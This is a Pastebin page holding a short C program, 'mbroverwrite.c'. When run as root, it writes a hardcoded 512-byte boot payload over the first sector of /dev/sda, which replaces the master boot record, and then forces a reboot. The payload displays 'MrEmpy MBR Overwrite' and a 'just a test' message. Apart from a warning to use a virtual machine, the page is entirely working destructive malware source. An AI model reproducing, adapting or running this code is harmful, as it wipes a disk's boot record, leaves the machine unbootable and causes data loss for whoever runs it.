Advertisement
FlyFar

mbroverwrite.c

Jun 20th, 2023
943
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.80 KB | Cybersecurity | 0 0
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <unistd.h>
  4.  
  5. #define DISK "/dev/sda"
  6.  
  7. int main() {
  8.     unsigned char payload[] = {0x04, 0xE8, 0x14, 0x00, 0xE8, 0x18, 0x00, 0xBE, 0x4A, 0x7C, 0xE8, 0x1C, 0x00, 0xBE, 0x6B, 0x7C,
  9. 0xE8, 0x16, 0x00, 0xE8, 0x25, 0x00, 0xEB, 0xFE, 0x8C, 0xC0, 0x8E, 0xD8, 0x8E, 0xD0, 0xC3, 0xB4,
  10. 0x00, 0xB0, 0x13, 0xCD, 0x10, 0xB8, 0x13, 0x00, 0xC3, 0xB4, 0x0E, 0x8A, 0x1E, 0x00, 0x7C, 0x8A,
  11. 0x04, 0xCD, 0x10, 0x46, 0x8A, 0x04, 0x3C, 0x00, 0x75, 0xF7, 0xC3, 0xB4, 0x00, 0xCD, 0x16, 0x3C,
  12. 0x0D, 0x74, 0x02, 0xEB, 0xF6, 0xEA, 0x00, 0x00, 0xFF, 0xFF, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
  13. 0x20, 0x20, 0x20, 0x20, 0x4D, 0x72, 0x45, 0x6D, 0x70, 0x79, 0x20, 0x4D, 0x42, 0x52, 0x20, 0x4F,
  14. 0x76, 0x65, 0x72, 0x77, 0x72, 0x69, 0x74, 0x65, 0x0D, 0x0A, 0x00, 0x0A, 0x0A, 0x54, 0x68, 0x69,
  15. 0x73, 0x20, 0x69, 0x73, 0x20, 0x6A, 0x75, 0x73, 0x74, 0x20, 0x61, 0x20, 0x74, 0x65, 0x73, 0x74,
  16. 0x20, 0x61, 0x62, 0x6F, 0x75, 0x74, 0x20, 0x4D, 0x42, 0x52, 0x20, 0x49, 0x20, 0x64, 0x69, 0x64,
  17. 0x2E, 0x0D, 0x0A, 0x54, 0x68, 0x61, 0x6E, 0x6B, 0x73, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x74, 0x65,
  18. 0x73, 0x74, 0x69, 0x6E, 0x67, 0x20, 0x3B, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  19. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  20. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  21. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  22. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  23. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  24. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  25. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  26. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  27. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  28. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  29. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  30. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  31. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  32. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  33. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  34. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  35. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  36. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  37. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  38. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  39. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
  40. };
  41.     FILE* harddisk;
  42.  
  43.     if (geteuid() != 0) {
  44.         printf("You need to run as root user. Remember that running this binary can lead to LOSS OF THE CURRENT SYSTEM, run it in a virtual machine.\n");
  45.         return 1;
  46.     }
  47.    
  48.     printf("Starting...\n");
  49.     sleep(1);
  50.     printf("Writing payload inside %s\n", DISK);
  51.     harddisk = fopen(DISK, "wb");
  52.     fseek(harddisk, 0, SEEK_SET);
  53.     fwrite(payload, sizeof(payload), 1, harddisk);
  54.     fclose(harddisk);
  55.     printf("Payload successfully written! The machine will restart in 5 seconds\n");
  56.     sleep(5);
  57.     system("reboot");
  58.     return 0;
  59. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement